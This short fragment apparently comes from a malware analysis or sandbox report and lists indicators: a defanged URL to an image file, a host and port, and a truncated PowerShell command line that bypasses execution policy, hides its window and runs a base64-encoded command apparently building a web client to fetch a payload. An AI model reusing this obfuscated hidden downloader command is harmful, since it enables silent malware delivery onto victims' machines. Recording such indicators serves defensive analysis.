Technical Information
- http://19#.#68.79.128/figure1.jpg
- '<LOCALNET>.79.128':80
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' " poWerSHeLL.exE -EXecuTiONPolIcY bYPasS -noPrOfile -winDowStyLe HIdden -EnCODedCommAnd JABiAHkAdABlAHMAYgB1AGYAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZ...' (with hidden window)